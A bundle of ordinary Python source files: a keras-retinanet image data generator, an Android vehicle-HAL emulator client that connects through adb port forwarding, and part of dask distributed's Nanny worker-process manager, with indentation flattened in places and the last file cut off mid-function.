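#         def shutdown(self):
#             pass
#
#     class ConsoleLogger:
#         def run(self, steering, throttle):
#             print('steering=%.2f throttle=%.2f' % (steering, throttle))
#         def shutdown(self):
#             pass
#
#     v = Vehicle()
#     v.add(RandomPilot(), outputs=['steering', 'throttle'])
#     v.add(ConsoleLogger(), inputs=['steering', 'throttle'])
#     v.start(rate_hz=5, max_loop_count=20)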
|
generator.py
|
"""
Copyright 2017-2018 Fizyr (https://fizyr.com)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
import random
import threading
import warnings
import queue
import keras
from ..utils.anchors import (
anchor_targets_bbox,
bbox_transform,
anchors_for_shape,
guess_shapes
)
from ..utils.image import (
TransformParameters,
adjust_transform_for_image,
apply_transform,
preprocess_image,
resize_image,
)
from ..utils.transform import transform_aabb
class Generator(object):
""" Abstract generator class.
"""
def __init__(
self,
transform_generator = None,
batch_size=1,
group_method='random', # one of 'none', 'random', 'ratio'
shuffle_groups=True,
image_min_side=800,
image_max_side=1333,
transform_parameters=None,
compute_anchor_targets=anchor_targets_bbox,
compute_shapes=guess_shapes,
preprocess_image=preprocess_image,
):
""" Initialize Generator object.
Args
transform_generator : A generator used to randomly transform images and annotations.
batch_size : The size of the batches to generate.
group_method : Determines how images are grouped together (defaults to 'random', one of ('none', 'random', 'ratio')).
shuffle_groups : If True, shuffles the groups each epoch.
image_min_side : After resizing the minimum side of an image is equal to image_min_side.
image_max_side : If after resizing the maximum side is larger than image_max_side, scales down further so that the max side is equal to image_max_side.
transform_parameters : The transform parameters used for data augmentation.
compute_anchor_targets : Function handler for computing the targets of anchors for an image and its annotations.
compute_shapes : Function handler for computing the shapes of the pyramid for a given input.
preprocess_image : Function handler for preprocessing an image (scaling / normalizing) for passing through a network.
"""
self.transform_generator = transform_generator
self.batch_size = int(batch_size)
self.group_method = group_method
self.shuffle_groups = shuffle_groups
self.image_min_side = image_min_side
self.image_max_side = image_max_side
self.transform_parameters = transform_parameters or TransformParameters()
self.compute_anchor_targets = compute_anchor_targets
self.compute_shapes = compute_shapes
self.preprocess_image = preprocess_image
self.group_index = 0
self.lock = threading.Lock()
self.group_images()
# self.q = queue.Queue(maxsize=3)
# self.p = threading.Thread(target=self.producer, args=())
# self.p.start()
def size(self):
""" Size of the dataset.
"""
raise NotImplementedError('size method not implemented')
def num_classes(self):
""" Number of classes in the dataset.
"""
raise NotImplementedError('num_classes method not implemented')
def name_to_label(self, name):
""" Map name to label.
"""
raise NotImplementedError('name_to_label method not implemented')
def label_to_name(self, label):
""" Map label to name.
"""
raise NotImplementedError('label_to_name method not implemented')
def image_aspect_ratio(self, image_index):
""" Compute the aspect ratio for an image with image_index.
"""
raise NotImplementedError('image_aspect_ratio method not implemented')
def load_image(self, image_index):
""" Load an image at the image_index.
"""
raise NotImplementedError('load_image method not implemented')
def load_annotations(self, image_index):
""" Load annotations for an image_index.
"""
raise NotImplementedError('load_annotations method not implemented')
def load_annotations_group(self, group):
""" Load annotations for all images in group.
"""
return [self.load_annotations(image_index) for image_index in group]
def filter_annotations(self, image_group, annotations_group, group):
""" Filter annotations by removing those that are outside of the image bounds or whose width/height < 0.
"""
# test all annotations
for index, (image, annotations) in enumerate(zip(image_group, annotations_group)):
assert(isinstance(annotations, np.ndarray)), '\'load_annotations\' should return a list of numpy arrays, received: {}'.format(type(annotations))
# test x2 < x1 | y2 < y1 | x1 < 0 | y1 < 0 | x2 <= 0 | y2 <= 0 | x2 >= image.shape[1] | y2 >= image.shape[0]
invalid_indices = np.where(
(annotations[:, 2] <= annotations[:, 0]) |
(annotations[:, 3] <= annotations[:, 1]) |
(annotations[:, 0] < 0) |
(annotations[:, 1] < 0) |
(annotations[:, 2] > image.shape[1]) |
(annotations[:, 3] > image.shape[0])
)[0]
# delete invalid indices
if len(invalid_indices):
warnings.warn('Image with id {} (shape {}) contains the following invalid boxes: {}.'.format(
group[index],
image.shape,
[annotations[invalid_index, :] for invalid_index in invalid_indices]
))
annotations_group[index] = np.delete(annotations, invalid_indices, axis=0)
return image_group, annotations_group
def load_image_group(self, group):
""" Load images for all images in a group.
"""
return [self.load_image(image_index) for image_index in group]
def random_transform_group_entry(self, image, annotations):
""" Randomly transforms image and annotation.
"""
# randomly transform both image and annotations
if self.transform_generator:
transform = adjust_transform_for_image(next(self.transform_generator), image, self.transform_parameters.relative_translation)
image = apply_transform(transform, image, self.transform_parameters)
# Transform the bounding boxes in the annotations.
annotations = annotations.copy()
for index in range(annotations.shape[0]):
annotations[index, :4] = transform_aabb(transform, annotations[index, :4])
return image, annotations
def resize_image(self, image):
""" Resize an image using image_min_side and image_max_side.
"""
return resize_image(image, min_side=self.image_min_side, max_side=self.image_max_side)
def preprocess_group_entry(self, image, annotations):
""" Preprocess image and its annotations.
"""
# preprocess the image
image = self.preprocess_image(image)
# randomly transform image and annotations
image, annotations = self.random_transform_group_entry(image, annotations)
# resize image
image, image_scale = self.resize_image(image)
# apply resizing to annotations too
annotations[:, :4] *= image_scale
return image, annotations
def preprocess_group(self, image_group, annotations_group):
""" Preprocess each image and its annotations in its group.
"""
for index, (image, annotations) in enumerate(zip(image_group, annotations_group)):
# preprocess a single group entry
image, annotations = self.preprocess_group_entry(image, annotations)
# copy processed data back to group
image_group[index] = image
annotations_group[index] = annotations
return image_group, annotations_group
def group_images(self):
""" Order the images according to self.order and makes groups of self.batch_size.
"""
# determine the order of the images
order = list(range(self.size()))
if self.group_method == 'random':
random.shuffle(order)
elif self.group_method == 'ratio':
order.sort(key=lambda x: self.image_aspect_ratio(x))
# divide into groups, one group = one batch
self.groups = [[order[x % len(order)] for x in range(i, i + self.batch_size)] for i in range(0, len(order), self.batch_size)]
def compute_inputs(self, image_group):
""" Compute inputs for the network using an image_group.
"""
# get the max image shape
max_shape = tuple(max(image.shape[x] for image in image_group) for x in range(3))
# construct an image batch object
image_batch = np.zeros((self.batch_size,) + max_shape, dtype=keras.backend.floatx())
# copy all images to the upper left part of the image batch object
for image_index, image in enumerate(image_group):
image_batch[image_index, :image.shape[0], :image.shape[1], :image.shape[2]] = image
return image_batch
def generate_anchors(self, image_shape):
return anchors_for_shape(image_shape, shapes_callback=self.compute_shapes)
def compute_targets(self, image_group, annotations_group):
""" Compute target outputs for the network using images and their annotations.
"""
# get the max image shape
max_shape = tuple(max(image.shape[x] for image in image_group) for x in range(3))
anchors = self.generate_anchors(max_shape)
regression_batch = np.empty((self.batch_size, anchors.shape[0], 4 + 1), dtype=keras.backend.floatx())
labels_batch = np.empty((self.batch_size, anchors.shape[0], self.num_classes() + 1), dtype=keras.backend.floatx())
# compute labels and regression targets
for index, (image, annotations) in enumerate(zip(image_group, annotations_group)):
# compute regression targets
labels_batch[index, :, :-1], annotations, labels_batch[index, :, -1] = self.compute_anchor_targets(
anchors,
annotations,
self.num_classes(),
mask_shape=image.shape,
)
regression_batch[index, :, :-1] = bbox_transform(anchors, annotations)
regression_batch[index, :, -1] = labels_batch[index, :, -1] # copy the anchor states to the regression batch
return [regression_batch, labels_batch]
def compute_input_output(self, group):
""" Compute inputs and target outputs for the network.
"""
# load images and annotations
image_group = self.load_image_group(group)
annotations_group = self.load_annotations_group(group)
# check validity of annotations
image_group, annotations_group = self.filter_annotations(image_group, annotations_group, group)
# perform preprocessing steps
image_group, annotations_group = self.preprocess_group(image_group, annotations_group)
# compute network inputs
inputs = self.compute_inputs(image_group)
# compute network targets
targets = self.compute_targets(image_group, annotations_group)
return inputs, targets
def __next__(self):
return self.next()
def next(self):
# advance the group index
with self.lock:
if self.group_index == 0 and self.shuffle_groups:
# shuffle groups at start of epoch
random.shuffle(self.groups)
group = self.groups[self.group_index]
self.group_index = (self.group_index + 1) % len(self.groups)
return self.compute_input_output(group)
# def producer(self):
# while True:
# try:
# # advance the group index
# if self.q.qsize() < 3:
# with self.lock:
# if self.group_index == 0 and self.shuffle_groups:
# # shuffle groups at start of epoch
# random.shuffle(self.groups)
# group = self.groups[self.group_index]
# self.group_index = (self.group_index + 1) % len(self.groups)
#
# inputs, targets = self.compute_input_output(group)
# self.q.put((inputs, targets))
# # print(self.q.qsize())
# except Exception as ex:
# print(ex)
#
# def consumer(self):
# try:
# value = self.q.get(True)
# return value
# except Exception as ex:
# print(ex)
#
# def next(self):
# return self.consumer()
#
# def __del__(self):
# self.p.join()
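# --- Editor-added usage sketch (not part of the original module) ---
# A minimal, hedged subclass showing which abstract methods a concrete
# generator must provide. The in-memory data is hypothetical; load_annotations
# is assumed to return an (N, 5) array of [x1, y1, x2, y2, label] per image,
# which is what filter_annotations() and compute_targets() operate on. Note
# that attributes used by group_images() must be set before calling
# Generator.__init__.
#
#     import numpy as np
#
#     class InMemoryGenerator(Generator):
#         def __init__(self, images, annotations, classes, **kwargs):
#             self.images = images            # list of HxWx3 uint8 arrays
#             self.annotations = annotations  # list of (N, 5) float arrays
#             self.classes = classes          # {class name: label}
#             self.labels = {v: k for k, v in classes.items()}
#             super(InMemoryGenerator, self).__init__(**kwargs)
#
#         def size(self):
#             return len(self.images)
#
#         def num_classes(self):
#             return len(self.classes)
#
#         def name_to_label(self, name):
#             return self.classes[name]
#
#         def label_to_name(self, label):
#             return self.labels[label]
#
#         def image_aspect_ratio(self, image_index):
#             height, width = self.images[image_index].shape[:2]
#             return float(width) / float(height)
#
#         def load_image(self, image_index):
#             return self.images[image_index]
#
#         def load_annotations(self, image_index):
#             return self.annotations[image_index]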
|
vhal_emulator.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
This module provides a vhal class which sends and receives messages to the vehicle HAL module
on an Android Auto device. It uses port forwarding via ADB to communicate with the Android
device.
Example Usage:
import vhal_consts_2_0 as c
from vhal_emulator import Vhal
# Create an instance of vhal class. Need to pass the vhal_types constants.
v = Vhal(c.vhal_types_2_0)
# Get the property config (if desired)
v.getConfig(c.VEHICLEPROPERTY_HVAC_TEMPERATURE_SET)
# Get the response message to getConfig()
reply = v.rxMsg()
print(reply)
# Set left temperature to 70 degrees
v.setProperty(c.VEHICLEPROPERTY_HVAC_TEMPERATURE_SET, c.VEHICLEAREAZONE_ROW_1_LEFT, 70)
# Get the response message to setProperty()
reply = v.rxMsg()
print(reply)
# Get the left temperature value
v.getProperty(c.VEHICLEPROPERTY_HVAC_TEMPERATURE_SET, c.VEHICLEAREAZONE_ROW_1_LEFT)
# Get the response message to getProperty()
reply = v.rxMsg()
print(reply)
NOTE: The rxMsg() is a blocking call, so it may be desirable to set up a separate RX thread
to handle any asynchronous messages coming from the device.
Example for creating RX thread (assumes vhal has already been instantiated):
from threading import Thread
# Define a simple thread that receives messages from a vhal object (v) and prints them
def rxThread(v):
while(1):
print(v.rxMsg())
rx = Thread(target=rxThread, args=(v,))
rx.start()
Protocol Buffer:
This module relies on VehicleHalProto_pb2.py being in sync with the protobuf in the VHAL.
If the VehicleHalProto.proto file has changed, re-generate the python version using:
protoc -I=<proto_dir> --python_out=<out_dir> <proto_dir>/VehicleHalProto.proto
"""
from __future__ import print_function
# Suppress .pyc files
import sys
sys.dont_write_bytecode = True
import socket
import struct
import subprocess
# Generate the protobuf file from hardware/interfaces/automotive/vehicle/2.0/default/impl/vhal_v2_0
# It is recommended to use the protoc provided in: prebuilts/tools/common/m2/repository/com/google/protobuf/protoc/3.0.0
# or a later version, in order to provide Python 3 compatibility
# protoc -I=proto --python_out=proto proto/VehicleHalProto.proto
import VehicleHalProto_pb2
# If container is a dictionary, retrieve the value for key item;
# Otherwise, get the attribute named item out of container
def getByAttributeOrKey(container, item, default=None):
if isinstance(container, dict):
try:
return container[item]
except KeyError as e:
return default
try:
return getattr(container, item)
except AttributeError as e:
return default
class Vhal:
"""
Dictionary of prop_id to value_type. Used by setProperty() to properly format data.
"""
_propToType = {}
### Private Functions
def _txCmd(self, cmd):
"""
Transmits a protobuf to Android Auto device. Should not be called externally.
"""
# Serialize the protobuf into a string
msgStr = cmd.SerializeToString()
msgLen = len(msgStr)
# Convert the message length into int32 byte array
msgHdr = struct.pack('!I', msgLen)
# Send the message length first
self.sock.sendall(msgHdr)
# print("hello")
# Then send the protobuf
self.sock.sendall(msgStr)
### Public Functions
def printHex(self, data):
"""
For debugging, print the protobuf message string in hex.
"""
print("len = ", len(data), "str = ",
":".join("{:02x}".format(ord(d)) for d in data))
def openSocket(self, device=None):
"""
Connects to an Android Auto device running a Vehicle HAL with simulator.
"""
# Hard-coded socket port needs to match the one in DefaultVehicleHal
remotePortNumber = 33452
extraArgs = '' if device is None else '-s %s' % device
adbCmd = '/home/himinds/Android/android-pie-compile/out/host/linux-x86/bin/adb %s forward tcp:0 tcp:%d' % (
extraArgs, remotePortNumber)
adbResp = subprocess.check_output(adbCmd, shell=True)[0:-1]
localPortNumber = int(adbResp)
#localPortNumber = 44567
#adbCmd1 = 'qemu-system-x86_64 -m 2048 -boot d -enable-kvm -smp 3 -net nic -net user,hostfwd=tcp::4444-:5555,hostfwd=tcp::%d-:33452 -hda /home/himinds/Android/android-image-x86_64/android-oreo.img -cdrom /home/himinds/Android/android-x86-oreo/out/target/product/x86_64android_x86_64.iso' % (extraArgs, localPortNumber)
#adbResp1 = subprocess.check_output(adbCmd1, shell=True)[0:-1]
print('Connecting local port %s to remote port %s on %s' %
(localPortNumber, remotePortNumber,
'default device' if device is None else 'device %s' % device))
# Open the socket and connect
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect(('localhost', localPortNumber))
print("hello")
def rxMsg(self):
"""
Receive a message over the socket. This function blocks if a message is not available.
May want to wrap this function inside of an rx thread to also collect asynchronous
messages generated by the device.
"""
# Receive the message length (int32) first
b = self.sock.recv(4)
if (len(b) == 4):
msgLen, = struct.unpack('!I', b)
if (msgLen > 0):
# Receive the actual message
b = self.sock.recv(msgLen)
if (len(b) == msgLen):
# Unpack the protobuf
msg = VehicleHalProto_pb2.EmulatorMessage()
msg.ParseFromString(b)
return msg
else:
print("Ignored message fragment")
def getConfig(self, prop):
"""
Sends a getConfig message for the specified property.
"""
cmd = VehicleHalProto_pb2.EmulatorMessage()
cmd.msg_type = VehicleHalProto_pb2.GET_CONFIG_CMD
propGet = cmd.prop.add()
propGet.prop = prop
self._txCmd(cmd)
def getConfigAll(self):
"""
Sends a getConfigAll message to the host. This will return all configs available.
"""
print("getCONFIGALL")
cmd = VehicleHalProto_pb2.EmulatorMessage()
cmd.msg_type = VehicleHalProto_pb2.GET_CONFIG_ALL_CMD
self._txCmd(cmd)
def getProperty(self, prop, area_id):
"""
Sends a getProperty command for the specified property ID and area ID.
"""
cmd = VehicleHalProto_pb2.EmulatorMessage()
cmd.msg_type = VehicleHalProto_pb2.GET_PROPERTY_CMD
propGet = cmd.prop.add()
propGet.prop = prop
propGet.area_id = area_id
self._txCmd(cmd)
def getPropertyAll(self):
"""
Sends a getPropertyAll message to the host. This will return all properties available.
"""
cmd = VehicleHalProto_pb2.EmulatorMessage()
cmd.msg_type = VehicleHalProto_pb2.GET_PROPERTY_ALL_CMD
self._txCmd(cmd)
def setProperty(self,
prop,
area_id,
value,
status=VehicleHalProto_pb2.AVAILABLE):
"""
Sends a setProperty command for the specified property ID, area ID, value and status.
If Status is not specified, automatically send AVAILABLE as the default.
This function chooses the proper value field to populate based on the config for the
property. It is the caller's responsibility to ensure the value data is the proper
type.
"""
cmd = VehicleHalProto_pb2.EmulatorMessage()
cmd.msg_type = VehicleHalProto_pb2.SET_PROPERTY_CMD
propValue = cmd.value.add()
propValue.prop = prop
# Insert value into the proper area
propValue.area_id = area_id
propValue.status = status
# Determine the value_type and populate the correct value field in protoBuf
try:
valType = self._propToType[prop]
except KeyError:
raise ValueError('propId is invalid:', prop)
propValue.value_type = valType
if valType in self._types.TYPE_STRING:
propValue.string_value = value
elif valType in self._types.TYPE_BYTES:
propValue.bytes_value = value
elif valType in self._types.TYPE_INT32:
propValue.int32_values.append(value)
elif valType in self._types.TYPE_INT64:
propValue.int64_values.append(value)
elif valType in self._types.TYPE_FLOAT:
propValue.float_values.append(value)
elif valType in self._types.TYPE_INT32S:
propValue.int32_values.extend(value)
elif valType in self._types.TYPE_FLOATS:
propValue.float_values.extend(value)
elif valType in self._types.TYPE_MIXED:
propValue.string_value = \
getByAttributeOrKey(value, 'string_value', '')
propValue.bytes_value = \
getByAttributeOrKey(value, 'bytes_value', '')
for newValue in getByAttributeOrKey(value, 'int32_values', []):
propValue.int32_values.append(newValue)
for newValue in getByAttributeOrKey(value, 'int64_values', []):
propValue.int64_values.append(newValue)
for newValue in getByAttributeOrKey(value, 'float_values', []):
propValue.float_values.append(newValue)
else:
raise ValueError('value type not recognized:', valType)
self._txCmd(cmd)
def __init__(self, types, device=None):
# Save the list of types constants
self._types = types
# Open the socket
self.openSocket(device)
# Get the list of configs
self.getConfigAll()
msg = self.rxMsg()
# Parse the list of configs to generate a dictionary of prop_id to type
for cfg in msg.config:
self._propToType[cfg.prop] = cfg.value_type
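# Usage sketch (illustrative only, not part of the original tool). It assumes
# the enclosing class is named Vhal, as in AOSP's vhal_emulator.py, and that a
# generated constants module (here called vhal_consts_2_0, providing the
# vhal_types_2_0 type table) is importable; adjust the names to your tree.
if __name__ == '__main__':
    import vhal_consts_2_0 as c
    v = Vhal(c.vhal_types_2_0)   # opens the adb-forwarded socket to the HAL
    v.getConfigAll()             # request every property config
    print(v.rxMsg())             # blocking receive of the reply
    # For asynchronous property-change events, rxMsg() can instead be polled
    # from a background receive thread.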
|
nanny.py
|
import asyncio
import errno
import logging
import os
import shutil
import threading
import uuid
import warnings
import weakref
from contextlib import suppress
from multiprocessing.queues import Empty
from time import sleep as sync_sleep
import psutil
from tornado import gen
from tornado.ioloop import IOLoop, PeriodicCallback
import dask
from dask.system import CPU_COUNT
from dask.utils import parse_timedelta
from . import preloading
from .comm import get_address_host, unparse_host_port
from .comm.addressing import address_from_user_args
from .core import CommClosedError, RPCClosed, Status, coerce_to_address
from .node import ServerNode
from .process import AsyncProcess
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
TimeoutError,
get_ip,
json_load_robust,
mp_context,
parse_ports,
silence_logging,
)
from .worker import Worker, parse_memory_limit, run
logger = logging.getLogger(__name__)
class Nanny(ServerNode):
"""A process to manage worker processes
The nanny spins up Worker processes, watches them, and kills or restarts
them as necessary. It is necessary if you want to use the
``Client.restart`` method, or to restart the worker automatically if
it reaches the terminate fraction of its memory limit.
The parameters for the Nanny are mostly the same as those for the Worker.
See Also
--------
Worker
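Examples
--------
Nannies are normally created for you by the ``dask-worker`` command line
tool rather than instantiated directly. A minimal sketch (the scheduler
address below is illustrative):

>>> n = await Nanny("tcp://127.0.0.1:8786", nthreads=2)  # doctest: +SKIP
>>> await n.close()  # doctest: +SKIP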
"""
_instances = weakref.WeakSet()
process = None
status = Status.undefined
def __init__(
self,
scheduler_ip=None,
scheduler_port=None,
scheduler_file=None,
worker_port=0,
nthreads=None,
ncores=None,
loop=None,
local_dir=None,
local_directory=None,
services=None,
name=None,
memory_limit="auto",
reconnect=True,
validate=False,
quiet=False,
resources=None,
silence_logs=None,
death_timeout=None,
preload=None,
preload_argv=None,
preload_nanny=None,
preload_nanny_argv=None,
security=None,
contact_address=None,
listen_address=None,
worker_class=None,
env=None,
interface=None,
host=None,
port=None,
protocol=None,
config=None,
**worker_kwargs,
):
self._setup_logging(logger)
self.loop = loop or IOLoop.current()
if isinstance(security, dict):
security = Security(**security)
self.security = security or Security()
assert isinstance(self.security, Security)
self.connection_args = self.security.get_connection_args("worker")
if local_dir is not None:
warnings.warn("The local_dir keyword has moved to local_directory")
local_directory = local_dir
if local_directory is None:
local_directory = dask.config.get("temporary-directory") or os.getcwd()
if not os.path.exists(local_directory):
os.makedirs(local_directory)
self._original_local_dir = local_directory
local_directory = os.path.join(local_directory, "dask-worker-space")
else:
self._original_local_dir = local_directory
self.local_directory = local_directory
self.preload = preload
if self.preload is None:
self.preload = dask.config.get("distributed.worker.preload")
self.preload_argv = preload_argv
if self.preload_argv is None:
self.preload_argv = dask.config.get("distributed.worker.preload-argv")
if preload_nanny is None:
preload_nanny = dask.config.get("distributed.nanny.preload")
if preload_nanny_argv is None:
preload_nanny_argv = dask.config.get("distributed.nanny.preload-argv")
self.preloads = preloading.process_preloads(
self, preload_nanny, preload_nanny_argv, file_dir=self.local_directory
)
if scheduler_file:
cfg = json_load_robust(scheduler_file)
self.scheduler_addr = cfg["address"]
elif scheduler_ip is None and dask.config.get("scheduler-address"):
self.scheduler_addr = dask.config.get("scheduler-address")
elif scheduler_port is None:
self.scheduler_addr = coerce_to_address(scheduler_ip)
else:
self.scheduler_addr = coerce_to_address((scheduler_ip, scheduler_port))
if protocol is None:
protocol_address = self.scheduler_addr.split("://")
if len(protocol_address) == 2:
protocol = protocol_address[0]
if ncores is not None:
warnings.warn("the ncores= parameter has moved to nthreads=")
nthreads = ncores
self._given_worker_port = worker_port
self.nthreads = nthreads or CPU_COUNT
self.reconnect = reconnect
self.validate = validate
self.resources = resources
self.death_timeout = parse_timedelta(death_timeout)
self.Worker = Worker if worker_class is None else worker_class
self.env = env or {}
self.config = config or dask.config.config
worker_kwargs.update(
{
"port": worker_port,
"interface": interface,
"protocol": protocol,
"host": host,
}
)
self.worker_kwargs = worker_kwargs
self.contact_address = contact_address
self.memory_terminate_fraction = dask.config.get(
"distributed.worker.memory.terminate"
)
self.services = services
self.name = name
self.quiet = quiet
self.auto_restart = True
self.memory_limit = parse_memory_limit(memory_limit, self.nthreads)
if silence_logs:
silence_logging(level=silence_logs)
self.silence_logs = silence_logs
handlers = {
"instantiate": self.instantiate,
"kill": self.kill,
"restart": self.restart,
# cannot call it 'close' on the rpc side because of a naming conflict
"get_logs": self.get_logs,
"terminate": self.close,
"close_gracefully": self.close_gracefully,
"run": self.run,
}
super().__init__(
handlers=handlers, io_loop=self.loop, connection_args=self.connection_args
)
self.scheduler = self.rpc(self.scheduler_addr)
if self.memory_limit:
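# PeriodicCallback takes its interval in milliseconds: sample the worker's
# memory every 100 ms and act on it via memory_monitor() below.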
pc = PeriodicCallback(self.memory_monitor, 100)
self.periodic_callbacks["memory"] = pc
if (
not host
and not interface
and not self.scheduler_addr.startswith("inproc://")
):
host = get_ip(get_address_host(self.scheduler.address))
self._start_port = port
self._start_host = host
self._interface = interface
self._protocol = protocol
self._listen_address = listen_address
Nanny._instances.add(self)
self.status = Status.init
def __repr__(self):
return "<Nanny: %s, threads: %d>" % (self.worker_address, self.nthreads)
async def _unregister(self, timeout=10):
if self.process is None:
return
worker_address = self.process.worker_address
if worker_address is None:
return
allowed_errors = (TimeoutError, CommClosedError, EnvironmentError, RPCClosed)
with suppress(allowed_errors):
await asyncio.wait_for(
self.scheduler.unregister(address=self.worker_address), timeout
)
@property
def worker_address(self):
return None if self.process is None else self.process.worker_address
@property
def worker_dir(self):
return None if self.process is None else self.process.worker_dir
@property
def local_dir(self):
"""For API compatibility with Nanny"""
warnings.warn("The local_dir attribute has moved to local_directory")
return self.local_directory
async def start(self):
"""Start nanny, start local process, start watching"""
await super().start()
ports = parse_ports(self._start_port)
for port in ports:
start_address = address_from_user_args(
host=self._start_host,
port=port,
interface=self._interface,
protocol=self._protocol,
security=self.security,
)
try:
await self.listen(
start_address, **self.security.get_listen_args("worker")
)
except OSError as e:
if len(ports) > 1 and e.errno == errno.EADDRINUSE:
continue
else:
raise
else:
self._start_address = start_address
break
else:
raise ValueError(
f"Could not start Nanny on host {self._start_host}"
f"with port {self._start_port}"
)
self.ip = get_address_host(self.address)
for preload in self.preloads:
await preload.start()
logger.info(" Start Nanny at: %r", self.address)
response = await self.instantiate()
if response == Status.running:
assert self.worker_address
self.status = Status.running
else:
await self.close()
self.start_periodic_callbacks()
return self
async def kill(self, comm=None, timeout=2):
"""Kill the local worker process
Blocks until both the process is down and the scheduler is properly
informed
"""
self.auto_restart = False
if self.process is None:
return "OK"
deadline = self.loop.time() + timeout
await self.process.kill(timeout=0.8 * (deadline - self.loop.time()))
async def instantiate(self, comm=None) -> Status:
"""Start a local worker process
Blocks until the process is up and the scheduler is properly informed
"""
if self._listen_address:
start_arg = self._listen_address
else:
host = self.listener.bound_address[0]
start_arg = self.listener.prefix + unparse_host_port(
host, self._given_worker_port
)
if self.process is None:
worker_kwargs = dict(
scheduler_ip=self.scheduler_addr,
nthreads=self.nthreads,
local_directory=self._original_local_dir,
services=self.services,
nanny=self.address,
name=self.name,
memory_limit=self.memory_limit,
reconnect=self.reconnect,
resources=self.resources,
validate=self.validate,
silence_logs=self.silence_logs,
death_timeout=self.death_timeout,
preload=self.preload,
preload_argv=self.preload_argv,
security=self.security,
contact_address=self.contact_address,
)
worker_kwargs.update(self.worker_kwargs)
self.process = WorkerProcess(
worker_kwargs=worker_kwargs,
worker_start_args=(start_arg,),
silence_logs=self.silence_logs,
on_exit=self._on_exit_sync,
worker=self.Worker,
env=self.env,
config=self.config,
)
if self.death_timeout:
try:
result = await asyncio.wait_for(
self.process.start(), self.death_timeout
)
except TimeoutError:
await self.close(timeout=self.death_timeout)
logger.error(
"Timed out connecting Nanny '%s' to scheduler '%s'",
self,
self.scheduler_addr,
)
raise
else:
try:
result = await self.process.start()
except Exception:
await self.close()
raise
return result
async def restart(self, comm=None, timeout=2, executor_wait=True):
async def _():
if self.process is not None:
await self.kill()
await self.instantiate()
try:
await asyncio.wait_for(_(), timeout)
except TimeoutError:
logger.error("Restart timed out, returning before finished")
return "timed out"
else:
return "OK"
@property
def _psutil_process(self):
pid = self.process.process.pid
try:
self._psutil_process_obj
except AttributeError:
self._psutil_process_obj = psutil.Process(pid)
if self._psutil_process_obj.pid != pid:
self._psutil_process_obj = psutil.Process(pid)
return self._psutil_process_obj
def memory_monitor(self):
"""Track worker's memory. Restart if it goes above terminate fraction"""
if self.status != Status.running:
return
if self.process is None or self.process.process is None:
return None
process = self.process.process
try:
proc = self._psutil_process
memory = proc.memory_info().rss
except (ProcessLookupError, psutil.NoSuchProcess, psutil.AccessDenied):
return
frac = memory / self.memory_limit
if self.memory_terminate_fraction and frac > self.memory_terminate_fraction:
logger.warning(
"Worker exceeded %d%% memory budget. Restarting",
100 * self.memory_terminate_fraction,
)
process.terminate()
def is_alive(self):
return self.process is not None and self.process.is_alive()
def run(self, *args, **kwargs):
return run(self, *args, **kwargs)
def _on_exit_sync(self, exitcode):
self.loop.add_callback(self._on_exit, exitcode)
async def _on_exit(self, exitcode):
if self.status not in (
Status.init,
Status.closing,
Status.closed,
Status.closing_gracefully,
):
try:
await self._unregister()
except OSError:
if not self.reconnect:
await self.close()
return
try:
if self.status not in (
Status.closing,
Status.closed,
Status.closing_gracefully,
):
if self.auto_restart:
logger.warning("Restarting worker")
await self.instantiate()
elif self.status == Status.closing_gracefully:
await self.close()
except Exception:
logger.error(
"Failed to restart worker after its process exited", exc_info=True
)
@property
def pid(self):
return self.process and self.process.pid
def _close(self, *args, **kwargs):
warnings.warn("Worker._close has moved to Worker.close", stacklevel=2)
return self.close(*args, **kwargs)
def close_gracefully(self, comm=None):
"""
A signal that we shouldn't try to restart workers if they go away
This is used as part of the cluster shutdown process.
"""
self.status = Status.closing_gracefully
async def close(self, comm=None, timeout=5, report=None):
"""
Close the worker process, stop all comms.
"""
if self.status == Status.closing:
await self.finished()
assert self.status == Status.closed
if self.status == Status.closed:
return "OK"
self.status = Status.closing
logger.info("Closing Nanny at %r", self.address)
for preload in self.preloads:
await preload.teardown()
self.stop()
try:
if self.process is not None:
await self.kill(timeout=timeout)
except Exception:
pass
self.process = None
await self.rpc.close()
self.status = Status.closed
if comm:
await comm.write("OK")
await ServerNode.close(self)
class WorkerProcess:
# How often (in seconds) to poll the init message queue
_init_msg_interval = 0.05
def __init__(
self,
worker_kwargs,
worker_start_args,
silence_logs,
on_exit,
worker,
env,
config,
):
self.status = Status.init
self.silence_logs = silence_logs
self.worker_kwargs = worker_kwargs
self.worker_start_args = worker_start_args
self.on_exit = on_exit
self.process = None
self.Worker = worker
self.env = env
self.config = config
# Initialized when worker is ready
self.worker_dir = None
self.worker_address = None
async def start(self) -> Status:
"""
Ensure the worker process is started.
"""
enable_proctitle_on_children()
if self.status == Status.running:
return self.status
if self.status == Status.starting:
await self.running.wait()
return self.status
self.init_result_q = init_q = mp_context.Queue()
self.child_stop_q = mp_context.Queue()
uid = uuid.uuid4().hex
self.process = AsyncProcess(
target=self._run,
name="Dask Worker process (from Nanny)",
kwargs=dict(
worker_kwargs=self.worker_kwargs,
worker_start_args=self.worker_start_args,
silence_logs=self.silence_logs,
init_result_q=self.init_result_q,
child_stop_q=self.child_stop_q,
uid=uid,
Worker=self.Worker,
env=self.env,
config=self.config,
),
)
self.process.daemon = dask.config.get("distributed.worker.daemon", default=True)
self.process.set_exit_callback(self._on_exit)
self.running = asyncio.Event()
self.stopped = asyncio.Event()
self.status = Status.starting
try:
await self.process.start()
except OSError:
logger.exception("Nanny failed to start process", exc_info=True)
self.process.terminate()
self.status = Status.failed
return self.status
try:
msg = await self._wait_until_connected(uid)
except Exception:
self.status = Status.failed
self.process.terminate()
raise
if not msg:
return self.status
